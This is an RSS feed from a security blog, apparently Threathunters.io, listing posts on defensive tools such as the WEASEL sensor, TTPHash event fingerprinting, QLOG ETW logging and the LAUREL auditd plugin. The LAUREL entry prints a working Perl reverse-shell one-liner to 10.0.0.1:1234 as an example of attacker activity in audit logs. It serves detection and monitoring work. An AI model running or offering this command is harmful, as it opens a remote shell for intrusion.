<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Posts on Threathunters.io</title><link>https://threathunters.io/blog/posts/</link><description>Recent content in Posts on Threathunters.io</description><generator>Hugo -- gohugo.io</generator><language>en-us</language><lastBuildDate>Wed, 20 Aug 2025 00:00:00 +0000</lastBuildDate><atom:link href="https://threathunters.io/blog/posts/index.xml" rel="self" type="application/rss+xml"/><item><title>WEASEL Beta: Shaping a Sensor with and for Security Engineers</title><link>https://threathunters.io/blog/posts/weasel_beta/</link><pubDate>Wed, 20 Aug 2025 00:00:00 +0000</pubDate><guid>https://threathunters.io/blog/posts/weasel_beta/</guid><description>Most commercial sensors in the threat-hunting space are effective at data collection, but they often obscure critical details about how and under what conditions that data is captured. This lack of transparency makes sense from a vendor’s perspective—protecting intellectual property—but it leaves defenders with limited insight and little flexibility. With Weasel, we’re working toward closing that gap. The vision is to give engineers fine-grained control over collection logic, ensure data relevance, and provide the adaptability needed to handle enterprise-specific use cases and evolving threat landscapes.</description></item><item><title>TTPHash - A possible approach for event fingerprinting</title><link>https://threathunters.io/blog/posts/ttp_hash/</link><pubDate>Thu, 30 Dec 2021 00:00:00 +0000</pubDate><guid>https://threathunters.io/blog/posts/ttp_hash/</guid><description>The lack of a generally accepted method for calculating a telemetry event fingerprint to uniquely identify a specific event represents a gap in current telemetry collection practice. At present, the approach involves utilizing file hashes as a means to fingerprint observable entities, such as files. 
While file hashes serve as invaluable markers from the perspective of Indicators of Compromise (IOCs), their utility is restricted by their inability to furnish contextual insights regarding the event in question.</description></item><item><title>QLOG - ETW logging for process creation events</title><link>https://threathunters.io/blog/posts/qlog/</link><pubDate>Wed, 29 Dec 2021 00:00:00 +0000</pubDate><guid>https://threathunters.io/blog/posts/qlog/</guid><description>QLOG provides lightweight userland logging of process-creation events on Windows, written in C#. It&amp;rsquo;s under development and currently in an experimental state. QLOG uses ETW to collect telemetry; it doesn’t use API hooks and it doesn’t require a driver to be installed on the target system. Currently QLOG supports “process create” events, but other enriched events may follow soon. QLOG runs as a Windows Service, but can also run in console mode if you want output written directly to the console.</description></item><item><title>LAUREL: Linux Audit – Usable, Robust, Easy Logging</title><link>https://threathunters.io/blog/posts/intro_laurel/</link><pubDate>Sat, 25 Dec 2021 00:00:00 +0000</pubDate><guid>https://threathunters.io/blog/posts/intro_laurel/</guid><description>LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.
Why? Instead of audit events that look like this…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0=&amp;#34;perl&amp;#34; a1=&amp;#34;-e&amp;#34; a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742… …turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:
{ [...] &amp;#34;EXECVE&amp;#34;: { &amp;#34;argc&amp;#34;: 3, &amp;#34;ARGV&amp;#34;: [ &amp;#34;perl&amp;#34;, &amp;#34;-e&amp;#34;, &amp;#34;use Socket;$i=\&amp;#34;10.0.0.1\&amp;#34;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\&amp;#34;tcp\&amp;#34;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\&amp;#34;&amp;gt;&amp;amp;S\&amp;#34;);open(STDOUT,\&amp;#34;&amp;gt;&amp;amp;S\&amp;#34;);open(STDERR,\&amp;#34;&amp;gt;&amp;amp;S\&amp;#34;);exec(\&amp;#34;/bin/sh -i\&amp;#34;);};&amp;#34; ] }, [...] } This happens at the source.</description></item></channel></rss>